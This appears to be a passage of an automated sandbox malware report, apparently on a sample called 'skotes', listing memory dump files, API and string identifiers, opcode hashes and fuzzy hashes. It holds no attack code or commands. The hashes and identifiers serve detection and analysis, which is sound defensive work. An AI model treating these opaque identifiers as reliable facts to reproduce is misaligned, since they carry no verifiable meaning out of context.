                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                          • String ID: pContext
                                                          • API String ID: 548886458-2046700901
                                                          • Opcode ID: f1a8d4ed55fe9b02ad12696445150744fdfa96a4ab23f8b7069691c772e86f1b
                                                          • Instruction ID: 870b455e21932c9d7ac009b3af1cb251b731c73b8cdb0bd4c424deb55cfe59e6
                                                          • Opcode Fuzzy Hash: f1a8d4ed55fe9b02ad12696445150744fdfa96a4ab23f8b7069691c772e86f1b
                                                          • Instruction Fuzzy Hash: 23E0683AB00208ABCB00FB64E849C9EBBB89EC07107044025EA11E3380EF74EE45CBD0
                                                          APIs
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C034FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::invalid_argument::invalid_argument
                                                          • String ID: pScheduler$version
                                                          • API String ID: 2141394445-3154422776
                                                          • Opcode ID: 480e1af1958ff80bdcabd30c94004865adada1779578f930fce904012f903b22
                                                          • Instruction ID: be4831b3c192f42f4c1c07c0622f55699728addb0e50f8035a8474b1518bb1ba
                                                          • Opcode Fuzzy Hash: 480e1af1958ff80bdcabd30c94004865adada1779578f930fce904012f903b22
                                                          • Instruction Fuzzy Hash: 96E0863444024CBBCB26FA95C847BDC7B6C9B10709F18C121BC10250D19FB497C8DA82